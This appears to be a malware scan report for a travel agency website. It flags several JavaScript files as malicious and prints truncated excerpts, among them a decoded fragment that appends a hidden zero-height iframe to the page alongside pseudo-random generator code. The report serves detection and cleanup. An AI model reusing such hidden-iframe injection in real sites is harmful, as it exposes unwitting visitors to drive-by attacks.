Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=raytreacytravel.com
Result: Google has marked this website as suspicious; visiting it may harm your computer.
Details are available here (the link target is not preserved in this copy; see the diagnostic URL in the query above).
Scanned pages/files
Request | Server response | Status |
http://www.raytreacytravel.com/ | 200 OK Content-Length: 25986 Content-Type: text/html | clean |
http://www.raytreacytravel.com/media/system/js/caption.js | 200 OK Content-Length: 9162 Content-Type: application/x-javascript | malicious |
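Malicious code - confirmed by antiviruses (see below).
Note: the excerpt is truncated. It opens with what appears to be the file's ordinary caption code and ends with the tail of a separate fragment, "if(f)e(s);}", which also closes the cmenu.js and template.js excerpts below. The same trailer in several files suggests code was appended to existing scripts, so each flagged file should be compared with a known-good copy rather than judged from this excerpt alone.
Excerpt: var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = if(f)e(s);}
Antivirus reports: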
| ||
http://www.raytreacytravel.com/templates/bt_travelin/js/cmenu.js | 200 OK Content-Length: 23745 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function CMenu(aa){if(typeof aa.iname!='string'){alert('CMenu initialization error: Instance name is missing');return;} this.iname=aa.iname;var ba=navigator.userAgent.toLowerCase().match(/msie (\d(.\d*)?)/);var ca=ba&&ba[1]&&ba[1]<7;this.hide_timeout=typeof aa.hide_timeout!='number'?500:aa.hide_timeout;this.mi_layers=typeof aa.mi_layers!='number'?1:aa.mi_layers;if(this.mi_layers<1)this.mi_layers=1;this.mi_empty_normal_class=typeof aa.mi_empty_normal_class!='string'?'':a if(f)e(s);} Antivirus reports:
| ||
http://www.raytreacytravel.com/templates/bt_travelin/js/template.js | 200 OK Content-Length: 14425 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below).
Excerpt (truncated): function addEvent(obj, event, func) { if (obj.addEventListener) obj.addEventListener(event, func, false); else if (obj.attachEvent) obj.attachEvent('on' + event, func); } function travelin_get_wdg(wdg_center) { return { left: wdg_center.previousSibling.nodeType == 1 ? wdg_center.previousSibling : wdg_center.previousSibling.previousSibling, center: wdg_center, right: wdg_center.nextSibling.nodeType == 1 ? wdg_center.nextSibling : wdg_ce if(f)e(s);}
Decoded script (truncated in several places): function travelin_h_scroll() { if (document.travelinSearch) { document.travelinSearch.set_position(); } if (document.travelinTabs) { document.travelinTabs.set_position(); } } function travelin_h_resize() { var w = 0, h = 0; if (window.innerWidth) { w = window.innerWidth; h = window.innerHeight; } else if (document.documentElement && document.documentElement.clientWidth) {< ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see
Note: the visible part of the decoded script gives an element named ifrm zero height and hidden visibility and appends it to document.body, inside a try block whose catch is empty. It is followed by arithmetic that updates a seed from the constants A, Q, R and M, which appears to be a multiplicative congruential pseudo-random generator. The address loaded by the hidden element is not visible in this excerpt.
Antivirus reports:
| ||
http://www.raytreacytravel.com/templates/bt_travelin/js/ddpanel.js | 200 OK Content-Length: 12131 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function DDPanel(aa){var ba=document.getElementById(aa.source_id);if(!ba)return;this.iname=aa.iname;this.offset_wdg=document.getElementById(aa.offset_id);this.offset_tag_x=aa.offset_tag_x;this.offset_tag_align=aa.offset_tag_align;this.offset_cnt_x=aa.offset_cnt_x;this.offset_cnt_align=aa.offset_cnt_align;this.offset_y=aa.offset_y;this.speed=aa.speed;this.interval=aa.interval;this.state=0;this.timer=0;this.progress=0;this.y_start=0;var ca=null,src_cnt_node=null;ba=ba?ba.firstChild:null;while(ba){ Antivirus reports:
| ||
http://www.raytreacytravel.com/modules/mod_tabmods/scripts/mod_tabmods.js | 200 OK Content-Length: 2082 Content-Type: application/x-javascript | clean |
http://www.raytreacytravel.com/index.php?view=article&id=1:home&format=pdf | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.raytreacytravel.com/test404page.js | 404 Not Found Content-Length: 300 Content-Type: text/html | clean |
http://www.raytreacytravel.com/index.php?view=article&id=1:home&tmpl=component&print=1&layout=default&page= | 200 OK Content-Length: 2822 Content-Type: text/html | clean |
http://www.raytreacytravel.com/index.php?option=com_mailto&tmpl=component&link=aHR0cDovL3d3dy5yYXl0cmVhY3l0cmF2ZWwuY29tL2luZGV4LnBocD9vcHRpb249Y29tX2NvbnRlbnQmdmlldz1hcnRpY2xlJmlkPTE6aG9tZQ== | 200 OK Content-Length: 2788 Content-Type: text/html | clean |
http://www.raytreacytravel.com/images/RTTBookingform.pdf | 200 OK Content-Length: 300480 Content-Type: application/pdf | clean |
http://www.raytreacytravel.com/index.php?option=com_contact&view=category&catid=1&Itemid=2 | 200 OK Content-Length: 19739 Content-Type: text/html | clean |
http://www.raytreacytravel.com/index.php?option=com_contact&view=contact&id=1%3Aray-treacy-travel&catid=1%3Aray-treacy-travel&Itemid=2 | 200 OK Content-Length: 21045 Content-Type: text/html | clean |
http://www.raytreacytravel.com/media/system/js/validate.js | 200 OK Content-Length: 4246 Content-Type: application/x-javascript | clean |
http://www.raytreacytravel.com/index.php?option=com_contact&task=vcard&contact_id=1&format=raw&tmpl=component | 500 Internal Server Error Content-Length: 0 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: raytreacytravel.com
Result:
GET / HTTP/1.1
Host: raytreacytravel.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: raytreacytravel.com
Referer: http://www.google.com/search?q=raytreacytravel.com
Result:
The result is similar to the first query; no suspicious redirects were found. This check covers only the server's response to the two requests shown. The scripts flagged above run in the visitor's browser, so a clean redirect result does not by itself mean the site is safe to visit.